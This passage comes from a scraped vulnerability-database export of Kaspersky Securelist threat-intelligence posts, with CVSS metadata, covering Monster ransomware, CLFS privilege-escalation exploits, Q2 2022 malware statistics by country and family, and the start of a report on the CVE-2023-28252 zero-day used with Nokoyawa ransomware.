cross-platform ransomware variant: Monster. There are a couple of peculiar properties about Monster. First, unlike other new ransomware families that are written in modern cross-platform languages (e.g. Rust, Go), Monster is written in Delphi. 
Second, the malware has a GUI.\n\nThis latter property is especially peculiar, as we do not remember seeing this before. There are good reasons for this, because, why would one go through the effort of implementing this when most ransomware attacks are executed using the command line in an automated way during a targeted attack? The ransomware authors must have realized this as well, since they included the GUI as an optional command-line parameter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163241/Ransomware_updates__1-day_exploits_03.png>)\n\n**_GUI used by Monster_**\n\nThe rest of the ransomware is fairly typical. RSA + AES are used, and multiple threads help to speed up the encryption and decryption process.\n\nIn terms of victimology, we found a couple of victims located all over the world (Singapore, Indonesia, Bolivia).\n\n## CVE-2022-24521: private 1-day exploits used for attacking Windows 7-11\n\nCybercriminals have the capabilities to create so-called 1-day exploits within a matter of day(s) after the vulnerability is reported or fixed. This is the reason why many security professionals urge system admins and users to install security patches as soon as possible.\n\nOne such example is CVE-2022-24521, an arbitrary pointer dereference in the Common Log File System (CLFS) driver, which has a long history of vulnerabilities. CVE-2022-24521 allows an attacker to gain system privileges on the infected device and is exploited in different ways by various actors. Although this time, it must be said it took the criminals a little bit longer than usual to develop an exploit: two weeks after the vulnerability was disclosed. We did, however, find an exploit with a PE-timestamp dated about one week after the patch was released, indicating that a working exploit might have been available even earlier. In total, we found two different exploits, both having several versions. 
In both cases, the developers sell exploits privately and do not share them on GitHub or other online platforms.\n\nWhat is particularly interesting about these exploits is that they support a variety of Windows versions. This is something we usually see in commercial exploits. But the exploits have more in common: the two share a lot of debug messages. Because of these debug messages and the overall design of one of the exploits, we were able to link it to the other exploit for a much older vulnerability in the CLFS driver. In fact, we can say that the older exploit was reused for the newer vulnerability.\n\nFinally, it is worth mentioning that one of the exploits was used in the wild during an attack on a large retailer in the APAC region.\n\n## Conclusion\n\nIn this blogpost, we stepped away \u2014 even though just slightly \u2014 from solely covering ransomware. Although ransomware is still one of the biggest threats to organizations, one should realize how these attacks actually take place. Quite often criminals use exploits for which patches are already available, simply because the affected organizations do not have an optimal patching policy.\n\nProper threat intelligence can help organizations to protect themselves against these types of threats, despite a non-ideal policy. For example, as we highlighted in this blogpost, criminals sometimes reuse older exploit code for newer vulnerabilities. Properly written Yara rules help to catch these newer exploits. 
Also, discussing TTPs and what is currently popular amongst ransomware groups helps organizations to make better-informed decisions on how to protect their environments.\n\nFor any questions about our private reports, please contact [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T10:00:13", "type": "securelist", "title": "Ransomware updates & 1-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-08-24T10:00:13", "id": "SECURELIST:0921F9EC2DCA9018B105FA6E05CEE477", "href": "https://securelist.com/ransomware-updates-1-day-exploits/107291/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T16:13:15", "description": "\n\n * [IT threat evolution in Q2 2022](<https://securelist.com/it-threat-evolution-q2-2022/107099/>)\n * **IT threat evolution in Q2 2022. Non-mobile statistics**\n * [IT threat evolution in Q2 2022. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-mobile-statistics/107123/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2022:\n\n * Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.\n * Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 100,829 unique users.\n * Ransomware attacks were defeated on the computers of 74,377 unique users.\n * Our File Anti-Virus detected 55,314,176 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2022, Kaspersky solutions blocked the launch of malware designed to steal money from bank accounts on the computers of 100,829 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025224/01-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025321/02-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.8 \n2 | Afghanistan | 4.3 \n3 | Tajikistan | 3.8 \n4 | Paraguay | 3.1 \n5 | China | 
2.4 \n6 | Yemen | 2.4 \n7 | Uzbekistan | 2.2 \n8 | Sudan | 2.1 \n9 | Egypt | 2.0 \n10 | Mauritania | 1.9 \n \n_* Excluded are countries and territories with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 35.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.8 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.4 \n4 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 6 \n5 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 \n7 | IcedID | Trojan-Banker.Win32.IcedID | 2.1 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.9 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 1.8 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nIn the second quarter, the Lockbit group [launched a bug bounty program](<https://www.bleepingcomputer.com/news/security/lockbit-30-introduces-the-first-ransomware-bug-bounty-program/>). The cybercriminals are promising $1,000 to $1,000,000 for doxing of senior officials, reporting web service, Tox messenger or ransomware Trojan algorithm vulnerabilities, as well as for ideas on improving the Lockbit website and Trojan. This was the first-ever case of ransomware groups doing a (self-promotion?) campaign like that.\n\nAnother well-known group, Conti, said it was shutting down operations. 
The announcement followed a high-profile attack on Costa Rica's information systems, which prompted the government to [declare a state of emergency](<https://www.bleepingcomputer.com/news/security/costa-rica-declares-national-emergency-after-conti-ransomware-attacks/>). The Conti infrastructure was shut down in late June, but some in the infosec community believe that Conti members are either just rebranding or have split up and joined other ransomware teams, including Hive, AvosLocker and BlackCat.\n\nWhile some ransomware groups are drifting into oblivion, others seem to be making a comeback. REvil's website went back online in April, and researchers [discovered](<https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/>) a newly built specimen of their Trojan. This might have been a test build, as the sample did not encrypt any files, but these events may herald the impending return of REvil.\n\nKaspersky researchers found a way to recover files encrypted by the Yanluowang ransomware and [released a decryptor](<https://securelist.ru/how-to-recover-files-encrypted-by-yanluowang/105019/>) for all victims. 
Yanluowang has been spotted in targeted attacks against large businesses in the US, Brazil, Turkey, and other countries.\n\n### Number of new modifications\n\nIn Q2 2022, we detected 15 new ransomware families and 2355 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2021 \u2014 Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025415/03-en-ru-es-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2022, Kaspersky products and technologies protected 74,377 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025443/04-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025517/05-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.81 \n2 | Yemen | 1.24 \n3 | South Korea | 1.11 \n4 | Mozambique | 0.82 \n5 | Taiwan | 0.70 \n6 | China | 0.46 \n7 | Pakistan | 0.40 \n8 | Angola | 0.37 \n9 | Venezuela | 0.33 \n10 | Egypt | 0.32 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 17.91 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.58 \n3 | Magniber | Trojan-Ransom.Win64.Magni | 9.80 \n4 | (generic verdict) | 
Trojan-Ransom.Win32.Gen | 7.91 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.75 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.55 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 3.51 \n8 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 3.02 \n9 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 2.96 \n10 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 2.69 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2022, Kaspersky solutions detected 40,788 new modifications of miners. A vast majority of these (more than 35,000) were detected in June. Thus, the spring depression \u2014 in March through May we found a total of no more than 10,000 new modifications \u2014 was followed by a record of sorts.\n\n_Number of new miner modifications, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025548/06-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 454,385 unique users of Kaspersky products and services worldwide. 
We are seeing a reverse trend here: miner attacks have gradually declined since the beginning of 2022.\n\n_Number of unique users attacked by miners, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025613/07-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025642/08-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Rwanda | 2.94 \n2 | Ethiopia | 2.67 \n3 | Tajikistan | 2.35 \n4 | Tanzania | 1.98 \n5 | Kyrgyzstan | 1.94 \n6 | Uzbekistan | 1.88 \n7 | Kazakhstan | 1.84 \n8 | Venezuela | 1.80 \n9 | Mozambique | 1.68 \n10 | Ukraine | 1.56 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nDuring Q2 2022, a number of major vulnerabilities were discovered in the Microsoft Windows. For instance, [CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) critical error allows an attacker to remotely execute arbitrary code in a system using a custom RPC request. The Network File System (NFS) driver was found to contain two RCE vulnerabilities: [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>). By sending a custom network message via the NFS protocol, an attacker can remotely execute arbitrary code in the system as well. Both vulnerabilities affect server systems with the NFS role activated. 
The [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) vulnerability targeting the Common Log File System (CLFS) driver was found in the wild. It allows elevation of local user privileges, although that requires the attacker to have gained a foothold in the system. [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), also known as LSA Spoofing, was another vulnerability found during live operation of server systems. It allows an unauthenticated attacker to call an LSARPC interface method and get authenticated by Windows domain controller via the NTLM protocol. These vulnerabilities are an enduring testament to the importance of timely OS and software updates.\n\nMost of the network threats detected in Q2 2022 had been mentioned in previous reports. Most of those were attacks that involved [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) access to various web services. The most popular protocols and technologies susceptible to these attacks include MS SQL Server, RDP and SMB. Attacks that use the EternalBlue, EternalRomance and similar exploits are still popular. Exploitation of Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>)) is also quite common, as the susceptible Java library is often used in web applications. Besides, the Spring MVC framework, used in many Java-based web applications, was found to contain a new vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) that exploits the data binding functionality and results in remote code execution. 
Finally, we have observed a rise in attacks that exploit insecure deserialization, which can also result in access to remote systems due to incorrect or missing validation of untrusted user data passed to various applications.\n\n### Vulnerability statistics\n\nExploits targeting Microsoft Office vulnerabilities grew in the second quarter to 82% of the total. Cybercriminals were spreading malicious documents that exploited [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which are the best-known vulnerabilities in the Equation Editor component. Exploitation involves the component memory being damaged and a specially designed script, run on the target computer. Another vulnerability, [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), allows downloading and running a malicious script when opening an infected document, to execute various operations in a vulnerable system. The emergence of [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>)[or Follina vulnerability](<https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/>) also increased the number of exploits in this category. An attacker can use a custom malicious document with a link to an external OLE object, and a special URI scheme to have Windows run the MSDT diagnostics tool. 
This, in turn, combined with a special set of parameters passed to the victim's computer, can cause an arbitrary command to be executed \u2014 even if macros are disabled and the document is opened in Protected Mode.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025713/09-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nAttempts at exploiting vulnerabilities that affect various script engines and, specifically, browsers, dipped to 5%. In the second quarter, a number of critical RCE vulnerabilities were discovered in various Google Chrome based browsers: [CVE-2022-0609](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-0609>), [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>), and [CVE-2022-1364](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1364>). The first one was found in the animation component; it exploits a Use-After-Free error, causing memory damage, which is followed by the attacker creating custom objects to execute arbitrary code. The second and third vulnerabilities are Type Confusion errors associated with the V8 script engine; they also can result in arbitrary code being executed on a vulnerable user system. Some of the vulnerabilities discovered were found to have been exploited in targeted attacks, in the wild. Mozilla Firefox was found to contain a high-risk Use-After-Free vulnerability, [CVE-2022-1097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1097>), which appears when processing NSSToken-type objects from different streams. The browser was also found to contain [CVE-2022-28281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28281>), a vulnerability that affects the WebAuthn extension. 
A compromised Firefox content process can write data out of bounds of the parent process memory, thus potentially enabling code execution with elevated privileges. Two further vulnerabilities, [CVE-2022-1802](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>) and [CVE-2022-1529](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>), were exploited in cybercriminal attacks. The exploitation method, dubbed "prototype pollution", allows executing arbitrary JavaScript code in the context of a privileged parent browser process.\n\nAs in the previous quarter, Android exploits ranked third in our statistics with 4%, followed by exploits of Java applications, the Flash platform, and PDF documents, each with 3%.\n\n## Attacks on macOS\n\nThe second quarter brought with it a new batch of cross-platform discoveries. For instance, a new APT group [Earth Berberoka](<https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html>) (GamblingPuppet) that specializes in hacking online casinos, uses malware for Windows, Linux, and macOS. 
The [TraderTraitor](<https://www.cisa.gov/uscert/ncas/alerts/aa22-108a>) campaign targets cryptocurrency and blockchain organizations, attacking with malicious crypto applications for both Windows and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 25.61 \n2 | AdWare.OSX.Agent.ai | 12.08 \n3 | AdWare.OSX.Pirrit.j | 7.84 \n4 | AdWare.OSX.Pirrit.ac | 7.58 \n5 | AdWare.OSX.Pirrit.o | 6.48 \n6 | Monitor.OSX.HistGrabber.b | 5.27 \n7 | AdWare.OSX.Agent.u | 4.27 \n8 | AdWare.OSX.Bnodlero.at | 3.99 \n9 | Trojan-Downloader.OSX.Shlayer.a | 3.87 \n10 | Downloader.OSX.Agent.k | 3.67 \n11 | AdWare.OSX.Pirrit.aa | 3.35 \n12 | AdWare.OSX.Pirrit.ae | 3.24 \n13 | Backdoor.OSX.Twenbc.e | 3.16 \n14 | AdWare.OSX.Bnodlero.ax | 3.06 \n15 | AdWare.OSX.Agent.q | 2.73 \n16 | Trojan-Downloader.OSX.Agent.h | 2.52 \n17 | AdWare.OSX.Bnodlero.bg | 2.42 \n18 | AdWare.OSX.Cimpli.m | 2.41 \n19 | AdWare.OSX.Pirrit.gen | 2.08 \n20 | AdWare.OSX.Agent.gen | 2.01 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, the TOP 20 ranking for threats detected by Kaspersky security solutions for macOS users is dominated by various adware. AdWare.OSX.Amc.e, also known as Advanced Mac Cleaner, is a newcomer and already a leader, found with a quarter of all attacked users. Members of this family display fake system problem messages, offering to buy the full version to fix those. 
It was followed by members of the AdWare.OSX.Agent and AdWare.OSX.Pirrit families.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025743/10-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 2.93 \n2 | Canada | 2.57 \n3 | Spain | 2.51 \n4 | United States | 2.45 \n5 | India | 2.24 \n6 | Italy | 2.21 \n7 | Russian Federation | 2.13 \n8 | United Kingdom | 1.97 \n9 | Mexico | 1.83 \n10 | Australia | 1.82 \n \n_* Excluded from the rating are countries and territories with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2022, the country where the most users were attacked was again France (2.93%), followed by Canada (2.57%) and Spain (2.51%). 
AdWare.OSX.Amc.e was the most common adware encountered in these three countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol, as before.\n\nTelnet | 82.93% \n---|--- \nSSH | 17.07% \n \n**_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2022_**\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 93.75% \n---|--- \nSSH | 6.25% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n**#** | **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 36.28 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 14.66 \n3 | Backdoor.Linux.Mirai.ek | 9.15 \n4 | Backdoor.Linux.Mirai.ba | 8.82 \n5 | Trojan.Linux.Agent.gen | 4.01 \n6 | Trojan.Linux.Enemybot.a | 2.96 \n7 | Backdoor.Linux.Agent.bc | 2.58 \n8 | Trojan-Downloader.Shell.Agent.p | 2.36 \n9 | Trojan.Linux.Agent.mg | 1.72 \n10 | Backdoor.Linux.Mirai.cw | 1.45 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q2-2022/107025/#attacks-on-iot-honeypots>) for Q2 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### TOP 10 countries and territories that serve as sources of web-based attacks\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2022, Kaspersky solutions blocked 1,164,544,060 attacks launched from online resources across the globe. A total of 273,033,368 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025818/11-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users around the world, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n**#** | **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 26.07 \n2 | Hong Kong | 14.60 \n3 | Algeria | 14.40 \n4 | Nepal | 14.00 \n5 | Tunisia | 13.55 \n6 | Serbia | 12.88 \n7 | Sri Lanka | 12.41 \n8 | Albania | 12.21 \n9 | Bangladesh | 11.98 \n10 | Greece | 11.86 \n11 | Palestine | 11.82 \n12 | Qatar | 11.50 \n13 | Moldova | 11.47 \n14 | Yemen | 11.44 \n15 | Libya | 11.34 \n16 | Zimbabwe | 11.15 \n17 | Morocco | 11.03 \n18 | Estonia | 11.01 \n19 | Turkey | 10.75 \n20 | Mongolia | 10.50 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 8.31% of the Internet users' computers worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025917/12-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2022, our File Anti-Virus detected **55,314,176** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries and territories.\n\nNote that these rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n**#** | **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 47.54 \n2 | Tajikistan | 44.91 \n3 | Afghanistan | 43.19 \n4 | Yemen | 43.12 \n5 | Cuba | 42.71 \n6 | Ethiopia | 41.08 \n7 | Uzbekistan | 37.91 \n8 | Bangladesh | 37.90 \n9 | Myanmar | 36.97 \n10 | South Sudan | 36.60 \n11 | Syria | 35.60 \n12 | Burundi | 34.88 \n13 | Rwanda | 33.69 \n14 | Algeria | 33.61 \n15 | Benin | 33.60 \n16 | Tanzania | 32.88 \n17 | Malawi | 32.65 \n18 | Venezuela | 31.79 \n19 | Cameroon | 31.34 \n20 | Chad | 30.92 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025948/13-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nOn 
average worldwide, Malware-class local threats were registered on 14.65% of users' computers at least once during Q2. Russia scored 16.66% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-15T12:00:43", "type": "securelist", "title": "IT threat evolution in Q2 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-44228", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1097", "CVE-2022-1364", "CVE-2022-1529", "CVE-2022-1802", "CVE-2022-22965", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24521", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-28281", "CVE-2022-30190"], "modified": "2022-08-15T12:00:43", "id": "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "href": "https://securelist.com/it-threat-evolution-in-q2-2022-non-mobile-statistics/107133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-15T18:19:57", "description": "\n\n**Updated April 20, 2023**\n\nIn February 2023, Kaspersky technologies detected a number of attempts to execute similar 
elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East and North America, and, earlier, in Asia. These exploits were very similar to already known [Common Log File System (CLFS)](<https://en.wikipedia.org/wiki/Common_Log_File_System>) driver exploits that we had analyzed previously, but we decided to double-check, and it was worth it \u2013 one of the exploits turned out to be a zero-day that supports different versions and builds of Windows, including Windows 11. The exploit was highly obfuscated, with more than 80% of its code being "junk" elegantly compiled into the binary, but we quickly and fully reverse-engineered it and reported our findings to Microsoft. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of April Patch Tuesday.\n\nWhile the majority of zero-days that we've discovered in the past were used by APTs, this particular zero-day was used by a sophisticated cybercrime group that carries out ransomware attacks. This group is notable for its use of a large number of similar but unique Common Log File System (CLFS) driver exploits that were likely developed by the same exploit author. Since at least June 2022, we've identified five different exploits used in attacks on retail & wholesale, energy, manufacturing, healthcare, software development and other industries. Using the CVE-2023-28252 zero-day, this group attempted to deploy the Nokoyawa ransomware as a final payload. 
